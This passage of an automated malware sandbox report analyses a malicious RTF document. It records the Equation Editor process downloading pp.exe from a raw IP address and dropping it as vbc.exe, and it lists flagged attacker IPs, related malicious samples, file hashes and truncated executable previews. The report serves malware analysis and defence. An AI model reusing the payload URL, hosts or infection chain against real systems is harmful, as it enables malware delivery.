                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1yexplorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      162.0.232.118
                                                                                                                                                      		unknownCanada
                                                                                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                                                                                      146.148.194.209
                                                                                                                                                      		unknownUnited States
                                                                                                                                                      		26658HENGTONG-IDC-LLCUStrue
                                                                                                                                                      103.207.38.170
                                                                                                                                                      		unknownViet Nam
                                                                                                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:321301
                                                                                                                                                      Start date:20.11.2020
                                                                                                                                                      Start time:20:03:31
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:fqwBU8MyzT.rtf
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.troj.expl.evad.winRTF@12/8@3/3
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 19.7% (good quality ratio 18.6%)
                                                                                                                                                      • Quality average: 69.8%
                                                                                                                                                      • Quality standard deviation: 29.5%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 98%
                                                                                                                                                      • Number of executed functions: 158
                                                                                                                                                      • Number of non-executed functions: 60
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .rtf
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Active ActiveX Object
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/321301/sample/fqwBU8MyzT.rtf

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      20:04:44API Interceptor372x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                      20:04:47API Interceptor17x Sleep call for process: vbc.exe modified
                                                                                                                                                      20:04:49API Interceptor91x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                      20:05:11API Interceptor107x Sleep call for process: wlanext.exe modified
                                                                                                                                                      20:06:11API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      146.148.194.209104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • www.sgbanfang.com/glt/?T8kx=Jg/IIDFtDxc1kv0Qq0w5JS6M3VwEeM8XBZYNtdJs4K7ttfye2u9lQqIc4IuJQgd+A3Op&Tzu8=7n1tZr

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      www.sgbanfang.com104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.194.209

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      VNPT-AS-VNVNPTCorpVNProforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      Proforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 202.92.6.10
                                                                                                                                                      qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                                      • 221.132.33.88
                                                                                                                                                      FMFF7xj5.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.131
                                                                                                                                                      rJz6SePuqu.dllGet hashmaliciousBrowse
                                                                                                                                                      • 123.19.40.157
                                                                                                                                                      Order inquiry.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.38.182
                                                                                                                                                      Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                                                                                                                                      • 203.162.4.149
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lmGet hashmaliciousBrowse
                                                                                                                                                      • 113.160.161.75
                                                                                                                                                      OK093822333448.docGet hashmaliciousBrowse
                                                                                                                                                      • 103.255.237.196
                                                                                                                                                      http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/Get hashmaliciousBrowse
                                                                                                                                                      • 113.160.250.165
                                                                                                                                                      DETAILS.jarGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      Readmore Details.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      detail-information.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      executed.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.207.39.83
                                                                                                                                                      _000819.exeGet hashmaliciousBrowse
                                                                                                                                                      • 113.161.148.81
                                                                                                                                                      HENGTONG-IDC-LLCUS4lsCTb3dCs.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 104.243.142.209
                                                                                                                                                      RR300912398.exeGet hashmaliciousBrowse
                                                                                                                                                      • 202.14.6.102
                                                                                                                                                      104500.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.194.209
                                                                                                                                                      Email PO#.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.97.41
                                                                                                                                                      Proforma Invoice-1.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.127.161.217
                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.24.153.34
                                                                                                                                                      NAMECHEAP-NETUShttp://rwiqipwvnklaqkuu.ltiliqhting.com/asci/SmFjcXVlbGluZS5TY2hyYWRlckByYWJvYmFuay5jb20=Get hashmaliciousBrowse
                                                                                                                                                      • 198.54.120.245
                                                                                                                                                      Payment conflict- aptiv 082920134110.htmGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.116.10
                                                                                                                                                      Payment-244581781.docGet hashmaliciousBrowse
                                                                                                                                                      • 198.187.29.39
                                                                                                                                                      Order List.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.117.216
                                                                                                                                                      https://u19114248.ct.sendgrid.net/ls/click?upn=1kMFt-2Foese19BdzKqBBNxmUiDNiO3l4ozyKR3JHYHjGXyXtR1YgfLizwybC7hwFoy4wlb-2FUZczInc9Ssmzz4dQ-3D-3DuU6r_TCf26aIMQHFUMJSqtVnzlcWBqfQpkiFxCOBj9heiSevnqRkiapxQjkatt3r5u5xw-2FNDgXhA220pIRwcKmyMneET98pBkuhL-2FUwJCaSrvE5mZhnMBtJdZf9Opljklq5t7Y-2BINqElPIJU8bjYLY27qV6L-2FSwA36husfmMqwKagSwOgE04FdniEmY9uEbym50XNhqKw9lgczv6HrSrYNm6ouXnIayW-2FSBLzGYxoTYKe6OA-3DGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.114.178
                                                                                                                                                      Certificates Profile Details Of Our Company And About Us.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      Final-Payment-Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.0.236.49
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Payment Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Documentation.478396766.docGet hashmaliciousBrowse
                                                                                                                                                      • 198.187.31.83
                                                                                                                                                      Documentation.478396766.docGet hashmaliciousBrowse
                                                                                                                                                      • 192.64.118.88
                                                                                                                                                      tl2gnGyMz6eLhZG.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.219.248.45
                                                                                                                                                      Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.55
                                                                                                                                                      74725794.no.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.120.58
                                                                                                                                                      invoice payment.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.61.154.32
                                                                                                                                                      Certificates Profile Details Of Our Company.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60
                                                                                                                                                      https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                                                                                                                      • 199.188.200.253
                                                                                                                                                      xgarnica.exeGet hashmaliciousBrowse
                                                                                                                                                      • 198.54.122.60

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):711168
                                                                                                                                                      Entropy (8bit):7.6186010890207205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                                                                                                                      MD5:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      SHA1:52C3CA02828A4AD8E8DBF790A61B3D77379AD391
                                                                                                                                                      SHA-256:4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
                                                                                                                                                      SHA-512:062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://103.207.38.170/pp.exe
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@.....................................O....... ............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................P.......H.......P................................................................0..........*....0............(....(..........(.....(.....*..................0.............(.... ... 99H.a%..^E........A.......t.......[...)...+r.. kx\RZ F.<.a+...(...... ....Z J..ra+....( ..... y.Z.Z Y.@a+...(!..... ..4.Z ..3.a8z.....(".... ...Z ...Ia8a...*....0..D........ f7.i Y.~.a%..^E....!...........+..(....o....(#.... ....Z ].ha+..*.0...........($...*..0............o%...*.0............(&...*.0..
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B7CA7515-A895-478C-8EF6-6349A27B2C7C}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):11264
                                                                                                                                                      Entropy (8bit):3.622478034078107
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:5+LEwpnggZNIocJk3tmmaHh5VZS4F8CFrhGE4AI4UmoKviXJyLWNq2zacJ9:woTmcJktCPVZ3POzP8dveq2zNJ9
                                                                                                                                                      MD5:D6338D9D8D3514DEC974E4A251100FC0
                                                                                                                                                      SHA1:F558F5201CA0F7F0B58A7F87CEB4DE79A2B63A4C
                                                                                                                                                      SHA-256:1C0DB48641768E21B5F63F4ED1D09F685134F91BC53E6169F44A94F5A3752881
                                                                                                                                                      SHA-512:F66521FD00F06CE37DF0C958BDDE96EBB065F7A8A98F9495E09A2D1A6D0DE3F546D8C81FAB5543E93E4DCC5816B96A5C747EA4EFF72EF5C79C7A425FBC60FFEC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: #..._.)...+.2.^...*.'...9.^.1.;...+.%.?.+.`.(.,.~.;.0.0.?./.!.1.[.6.;.?.+.<.[...?.?.).@.).4.(.3.?.4.(...?.#.8.1.[.'.4.>.8.8.].;.`.1.'.*...?./.&.%.+.).?.].;...+.=.^.4.....8.%.#.3./.6.;.[.).$.5.9.5.#.8.].^.$.-.[.4.7.7.,.%.?.?.#.2...:.3.?.?._.?.3...5.?.^.$.].=._.#.~.$.*.3./.'.?.?.#.@.?.^.$.(.?.(..._.,.?.@.!.(.].@.,.?...'...,.6.?.<.>._.=.%.<.;.+.7.).[.&.<.=.2.>.3.../.?.2.!.'...>.%.5.0.).2.7.7.3.=.%.6.).-...:.$.`.+.3.~._.#.0.,.&.0.-.2.).?...).?.,.=.%...>.*.^.+.0.>.?.5.<.9.1.6.?.`.9...?.>.:.?.>.'.9.@.:.7.+.+.|.].<.$.6.@.~.)._.8.[.8.?.].'.%...#.&.3.~.).>.~.4.|.$...(.'.%.5./.`._.@.7.?.4.~.7.'.?.$.$.!...@.2.0.+.3.|.&.`.&._.?.4.?.].?.(.?.(.>.(.4.'.1.!.^.8.6.?.5.9.)...@.#.1.?.-.].?.@.,.+.?.#.?.#.?.>...>./...@.<.].*.7.'.).1.....=.%.,.?./.(...+.?./.5.*.|.<.<.!.!.@.1._.].%.6.%.?.<.?...0.9.,.'.?.2.-._.0.3.].5.4.(.~.?.'.3.^.!.2._.#.-.0.5.).'.?.&.2.&.*.4.$.?.[.5.].?..._.0.?.*.2.].:.|.1.=.!.#.#.2.`././.8.^.9.%.2.?./.^.;.>.$.0.-.1.%.-.'...:.,.?.0.4.4.?...+.=.=.@.@.,.(.?.^.$.....?.2.*.5.'.6.&.?.?.|.4.2.8.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD501063-4E04-4856-9DA8-291722E1F767}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\fqwBU8MyzT.LNK
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:20 2020, mtime=Wed Aug 26 14:08:20 2020, atime=Sat Nov 21 03:04:42 2020, length=10024, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2028
                                                                                                                                                      Entropy (8bit):4.557886614404819
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8oB/XT46kd2zvqZe+roDv3qc4dM7dD2oB/XT46kd2zvqZe+roDv3qc4dM7dV:8oB/XTDkd2zc1fQh2oB/XTDkd2zc1fQ/
                                                                                                                                                      MD5:E9735FC12377B7C04AB0CFB38ACA282C
                                                                                                                                                      SHA1:6F6A66E8CD8A5F0F960654D1A9450E6F27C427B6
                                                                                                                                                      SHA-256:289CD7F82404F1F2CC9C08FC7B84A10A65344102E08DEDDAD67D2E33E9C675EE
                                                                                                                                                      SHA-512:FECE57AB6D01AE3DBF5E43E47ACA2A41D22B218FCA50BCAE0C28A70C3F5381B8E5DC379101FC76079A326DB60CEA66203A9781A92A20B5A51C6829B13B6BE43C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: L..................F.... ....Pd..{...Pd..{...rp....('...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.('..uQ. .FQWBU8~1.RTF..J.......Q.y.Q.y*...8.....................f.q.w.B.U.8.M.y.z.T...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\fqwBU8MyzT.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.q.w.B.U.8.M.y.z.T...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):70
                                                                                                                                                      Entropy (8bit):4.53931900289512
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:HIUpnfNpzCbTwnfNpzCmxWIUpnfNpzCv:HpVNp+MNpqVNpI
                                                                                                                                                      MD5:B497E87D82221936A428D7E2E1009F13
                                                                                                                                                      SHA1:FE5FB05D98A16AD8007A4EA2EAC07CF40BD7C1E4
                                                                                                                                                      SHA-256:323E4670339317BDFA8ABAE5C0E9FDC09FBA1F69D3FBAFD6C65C3B827AB701FB
                                                                                                                                                      SHA-512:A980FB76728497CDD561C7D91FBCE6BF18CB21F20A365D6C0BDD671E2C9AAA6B788D203C2D39D189C9FC54CF0A6503EB4AB1284B61776123D14EBF6B2AB015FE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [misc]..fqwBU8MyzT.LNK=0..fqwBU8MyzT.LNK=0..[misc]..fqwBU8MyzT.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\user\Desktop\~$wBU8MyzT.rtf
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                                                                                      MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                                                                                      SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                                                                                      SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                                                                                      SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):711168
                                                                                                                                                      Entropy (8bit):7.6186010890207205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                                                                                                                      MD5:BB30A5DD4130B071FB4CA5F005371C63
                                                                                                                                                      SHA1:52C3CA02828A4AD8E8DBF790A61B3D77379AD391
                                                                                                                                                      SHA-256:4C73FD4286E76A094EEFAFE5369F3A184CA4A38D567AE6DFAD61645BF968A83F
                                                                                                                                                      SHA-512:062F184DEA6B1327418B7030B114CC40BF21072408FB9408BC18B823BCE73534CF513A566EF16F90C0379581FB9E189D8D39614334C04C1607AFBC02089AC0D1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@.....................................O....... ............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................P.......H.......P................................................................0..........*....0............(....(..........(.....(.....*..................0.............(.... ... 99H.a%..^E........A.......t.......[...)...+r.. kx\RZ F.<.a+...(...... ....Z J..ra+....( ..... y.Z.Z Y.@a+...(!..... ..4.Z ..3.a8z.....(".... ...Z ...Ia8a...*....0..D........ f7.i Y.~.a%..^E....!...........+..(....o....(#.... ....Z ].ha+..*.0...........($...*..0............o%...*.0............(&...*.0..

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                                                      Entropy (8bit):5.500483643483778
                                                                                                                                                      TrID:
                                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                                      File name:fqwBU8MyzT.rtf
                                                                                                                                                      File size:10024
                                                                                                                                                      MD5:b115f24fcecce5e8661300527a748448
                                                                                                                                                      SHA1:9673703628a2edf4fea0b3a764357f82b4c9ce9f
